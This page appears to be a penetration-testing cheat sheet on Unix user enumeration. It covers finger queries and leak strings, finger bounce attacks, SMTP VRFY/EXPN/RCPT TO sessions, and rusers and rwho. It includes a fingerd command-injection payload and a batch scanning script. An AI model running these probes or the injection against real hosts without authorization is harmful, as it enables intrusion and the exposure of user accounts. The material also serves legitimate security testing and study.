Elusive Thoughts: UNIX User Enumeration

Unix Common Enumeration Techniques

This pages cover all common user enumeration techniques for Unix and Linux systems.

finger User Enumeration

Enumerate all users - finger @target_host

Comment: Will give you also currently logged users.

Query user - finger username@target_host

Comment: Obtained information about the name,the home directory,login name and shell of the user.

Query user with string user - finger user@target_host

Comment: This specific command will enumerate all user accounts that have the string user.

finger Information Leaks

Enumerate all users - finger '1 2 3 4 5 6 7 8 9 0'@target_host

Comment: A popular attack involves issuing a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. A bug present in all Solaris releases up to Version 8; it lets you identify user accounts on the target system.

finger 0@target_host

finger .@target_host

finger **@target_host

finger user@target_host

finger test@target_host

Comment: Exploit Unix fingerd services that perform a simple cross-reference operation of the query string against user information fields in the /etc/passwd.

Enumerate all users - finger ‘a b c d e f g h’@host

Comment: This will enumerate all users on the remote target.

finger Redirection

Enumerate network - finger @target_host1@target_host2

Comment:In some cases, servers running fingerd exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and hostnames, you can perform a bounce attack to find internal usernames and host details.

Directly Exploitable finger Bugs

Command injection - finger "|/bin/ls -a /@target_host"

Comment: Poorly written fingerd implementations allow attackers to pipe commands through the service, which are, in turn, run on the target host by the owner of the service process (such as root or bin under Unix-based systems).

Directly Exploitable finger Using Scripts

#! /bin/sh

for ip in $(cat FINGER79.out); do

for user in $(cat users.lst); do

finger $user@$ip >> collector.out
sleep 2

echo "---scanning $user ---"
done

echo "Testing for finger Information Leaks in Solaris 8.0" >> collector.out

finger '1 2 3 4 5 6 7 8 9 0'@$ip >> collector.out
finger 0@$ip >> collector.out
finger **@$ip >> collector.out
finger 'a b c d e f g h'@$ip >> collector.out
finger '|/bin/ls -a /'@$ip >> collector.out
echo "---Finger finished scanning ---"

done

User Enumeration Using the SMTP VRFY Command

telnet target_host 25

220 myhost ESMTP Sendmail 8.9.3

501 HELO requires domain address

HELO some_domain

250 myhost Hello [xx.x.x.xx], pleased to meet you

VRFY root

250 Super-User <root@myhost>

VRFY test

550 test... User unknown

User Enumeration Using the SMTP EXPN Command

telnet target_host 25

Trying target_host...

Connected to target_host.

Escape character is '^]'.

220 myhost ESMTP Sendmail 8.9.3

HELO

501 HELO requires domain address

HELO x

250 myhost Hello [target_host], pleased to meet you

EXPN root

250 Super-User <root@myhost>

EXPN test

550 test... User unknown

User Enumeration Using the SMTP RCPT TO Command

telnet target_host 25

Trying target_host...

Connected to target_host.

Escape character is '^]'.

220 myhost ESMTP Sendmail 8.9.3

HELO

501 HELO requires domain address

HELO x

250 myhost Hello [target_host], pleased to meet you

MAIL FROM:root

250 root... Sender ok

RCPT TO:root

250 root... Recipient ok

RCPT TO: test

550 test... User unknown

rusers Enumerate Users

Local Network Users - rusers

Comment: Will return a list with the users that are logged into machines on the local network

Enumerate users per host - rusers -al target_host

Comment: Will return a list with the users of a specific host.

rwho User Enumeration

Enumerate all users - rwho -a

Comment: All the systems that are running the rwhod daemon will respond and an output will produced of the users that are currently logged in to these systems. This service runs at 513 (UDP) port.

References

Pages

UNIX User Enumeration